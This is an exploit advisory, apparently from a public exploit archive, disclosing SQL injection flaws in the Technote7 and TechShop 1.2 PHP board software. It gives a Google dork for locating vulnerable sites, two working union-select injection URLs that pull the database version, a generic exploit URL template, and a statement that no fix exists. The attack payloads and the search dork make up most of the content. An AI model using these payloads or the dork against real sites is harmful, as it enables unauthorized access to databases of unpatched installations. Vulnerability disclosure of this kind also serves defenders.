Tech Shop Technote 7 SQL Injection Vulnerability

2011-01-02 11:36:32

# Exploit Title: Technote7(Commercial Version, Free Version) <== SQL Injection Vulnerabilities
# Google Dork: inurl:/technote/board.php?category=
# Date: 2011/01/02
# Author: MaJ3stY(http://maj3sty.tistory.com)
# Language : PHP
# Software Link: http://www.technote.co.kr/php/technote1/board.php?board=consult&command=skin_insert&exe=insert_down_shop
# Version: Technote7, TechShop 1.2(The latest version of the current from)
# Tested on: All Windows, All Linux

PoC(Technote7) :

http://localhost/board.php?board=skinmarket&category=11 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61--

PoC(Technote7 - Techshop 1.2) :

http://localhost/board.php?board=agcmain&category=10 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--

Exploit :

http://site/board.php?board=boarname&category=[SQL Line]

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.